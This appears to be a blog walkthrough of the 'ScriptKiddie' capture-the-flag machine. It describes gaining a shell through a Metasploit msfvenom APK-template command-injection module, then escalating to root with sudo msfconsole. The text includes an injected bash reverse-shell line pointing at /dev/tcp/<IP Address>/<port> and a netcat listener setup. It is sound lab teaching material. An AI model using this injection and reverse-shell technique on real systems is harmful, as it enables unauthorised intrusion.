In this post, i would like to share a walkthrough on Scriptkiddie Machine.
This room has been considered difficulty rated as EASY machine
Information Gathering on ScriptKiddie
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Let’s open the website at the browser
Gaining Access
Let’s open Metasploit to get the msfvenom to upload it on the website above.
We will use exploit/unix/fileformat/Metasploit_msfvenom_apk_template_cmd_injection in order to get msf.apk file created
Now, we need to run the nc listener so that we can get the reverse shell connection back to us.
The malicious file has been created by Metasploit which we can use it to obtain the reverse shell on the machine itself
Now, we can upload the reverse shell and we should be getting the shell back if we look back into our nc listener
We got the user flag by going to /home/kid/
Escalate to Root Privileges on ScriptKiddie machine
For this step, I have difficulty getting it on the first try. As a result, I must ask around and luckily, I got some good advice from H0j3n and nikk37 on how to proceed with this.
echo ‘ ;/bin/bash -c “bash -I >& /dev/tcp/<IP Address>/<port> 0>&1” #’ >> hackers
We need not execute the following command to get to pwn privileges access
We need to execute the ssh file ./scanlosers.sh
After we manage to execute the bash file, we can check our privileges by running sudo -l
From the output, we know that msfconsole can be used to escalate the privileges.
Let’s run sudo msfconsole as pwn user
We already in root privileges once we get into Metasploit console.
As usual, we go to /root/ directory and retrieve the root flag
-THE END-
Happy Learning Guys!
No responses yet